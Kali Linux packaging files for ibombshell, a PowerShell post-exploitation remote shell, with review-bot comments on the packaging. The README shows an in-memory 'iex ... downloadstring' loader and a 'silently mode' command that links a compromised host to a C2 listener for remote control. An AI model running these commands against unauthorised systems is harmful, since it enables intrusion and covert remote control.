Initial release
Sophie Brun
4 years ago
ibombshell in Kali
------------------

## ibombshell everywhere

When the package ibombshell is installed in Kali you can load ibombshell
with:

```[powershell]
iex (new-object net.webclient).downloadstring('/usr/share/ibombshell/console')
```

And then run the ibombshell console:

```[powershell]
console
```


## ibombshell silently mode
This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:

```[powershell]
iex (new-object net.webclient).downloadstring('/usr/share/ibombshell/console')
```

prepare the C2:
```[shell]
ibombshell
```
And create the listener where the warriors will connected:

```[ibombshell]
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run
```

The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:

```[powershell]
console -Silently -uriConsole http://[ip or domain]:[port]
```


More information in /usr/share/doc/ibombshell
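
Review bot: The "silently mode" section gives the listener's default port (8080) and a plain `http://` URI for `-uriConsole`, but never says which address the listener binds to or that the warrior traffic is unencrypted; one sentence on both would let the operator decide where the C2 port may be exposed. Wording in the same section: "will connected" should read "will connect", "silently mode" reads better as "Silently mode" to match the `-Silently` switch, and "prepare the C2:" should start with a capital and have a blank line before its fence like the other steps.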

ibombshell (0~git20200226-0kali1) kali-dev; urgency=medium

* Initial release

-- Sophie Brun <[email protected]> Thu, 27 Feb 2020 10:40:34 +0100

Source: ibombshell
Section: misc
Priority: optional
Maintainer: Kali Developers <[email protected]>
Uploaders: Sophie Brun <[email protected]>
Build-Depends: debhelper-compat (= 12)
Standards-Version: 4.5.0
Homepage: https://github.com/ElevenPaths/ibombshell
Vcs-Browser: https://gitlab.com/kalilinux/packages/ibombshell
Vcs-Git: https://gitlab.com/kalilinux/packages/ibombshell.git

Package: ibombshell
Architecture: all
Depends: ${shlibs:Depends}, ${misc:Depends},
powershell,
python3-termcolor,
python3-pynput
Description: Dynamic Remote Shell
This package contains a tool written in Powershell that allows you to have a
prompt at any time with post-exploitation functionalities (and in some cases
exploitation). It is a shell that is downloaded directly to memory providing
access to a large number of pentesting features. These functionalities can be
downloaded directly to memory, in the form of a Powershell function. This form
of execution is known as everywhere.
.
In addition, ibombshell provides a second execution mode called Silently, so
the pentester can execute an instance of ibombshell (called warrior). The
compromised computer will be connected to a C2 panel through HTTP. Therefore,
it will be possible to control the warrior and be able to load functions in
memory that help the pentester. This is happening whithin the
post-exploitation phase.
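
Review bot: `${shlibs:Depends}` in the `Depends:` field has nothing to expand to in an `Architecture: all` package that ships only scripts; drop it and keep `${misc:Depends}`. The helper script in this commit calls `python3` directly, so listing `python3` explicitly would state that dependency instead of leaving it to the `python3-*` modules. In the long description, "whithin" should be "within".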

Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: ibombshell
Source: https://github.com/ElevenPaths/ibombshell

Files: *
Copyright: ElevenPaths
License: GPL-3

Files: debian/*
Copyright: 2020 Sophie Brun <[email protected]>
License: GPL-3

License: GPL-3
This package is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License version 3 as published
by the Free Software Foundation.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>
.
On Debian systems, the complete text of the GNU General
Public License version 3 can be found in "/usr/share/common-licenses/GPL-3".

#!/bin/sh

set -e

cd /usr/share/ibombshell/ibombshell\ c2
exec python3 ibombshell.py "$@"
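
Review bot: The `cd` before `exec python3 ibombshell.py "$@"` replaces the caller's working directory, so any relative path passed as an argument resolves under `/usr/share/ibombshell/ibombshell c2` instead of where the user ran the command, and anything the program writes relative to its working directory would land in that system-owned tree. Either say so in README.Debian or add a short comment here explaining why the program has to start from that directory.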

README.md
papers/*
debian/README.*

console usr/share/ibombshell
functions.txt usr/share/ibombshell
ibombshell*c2 usr/share/ibombshell
data usr/share/ibombshell
debian/helper-script/* usr/bin

From: Sophie Brun <[email protected]>
Date: Tue, 10 Mar 2020 15:34:56 +0100
Subject: Use the installed files in console

---
console | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/console b/console
index c55932e..978d655 100644
--- a/console
+++ b/console
@@ -112,9 +112,9 @@ function console{


#Important: URL download ibombshell
- $gtRawBase = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/"
+ $gtRawBase = "/usr/share/ibombshell/"
$gtRawFunctions = "data/functions/"
- $functionsList = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/functions.txt"
+ $functionsList = "/usr/share/ibombshell/functions.txt"
[System.Collections.ArrayList]$global:functionsLoaded = "showcommands" , "showfunctions" , "quit"
[System.Collections.ArrayList]$global:internalFunctions = "detect-OS", "printprompt" , "printMessage", "printData", "isadmin", "commandsearch", "addcommand"
#Condition for exit
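
Review bot: The new `$functionsList` value repeats the `/usr/share/ibombshell/` prefix that the new `$gtRawBase` line already holds; deriving it from `$gtRawBase` would keep the install path in one place. The context comment `#Important: URL download ibombshell` no longer matches, since both values are now local paths rather than URLs, so update it in the same hunk. The patch header has From, Date and Subject only; a `Forwarded: not-needed` field would record that this change is specific to the packaged layout.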
@@ -314,4 +314,4 @@ results=$results
}
}
}
-}
\ No newline at end of file
+}

Use-the-installed-files-in-console.patch

#!/usr/bin/make -f
#export DH_VERBOSE = 1

%:
dh $@

ibombshell source: source-contains-prebuilt-windows-binary *

version=4
opts="filenamemangle=s%(?:.*?)?v?(\d[\d.]*)\.tar\.gz%ibombshell-$1.tar.gz%" \
https://github.com/ElevenPaths/ibombshell/tags \
(?:.*?/)?v?(\d[\d.]*)\.tar\.gz debian uupdate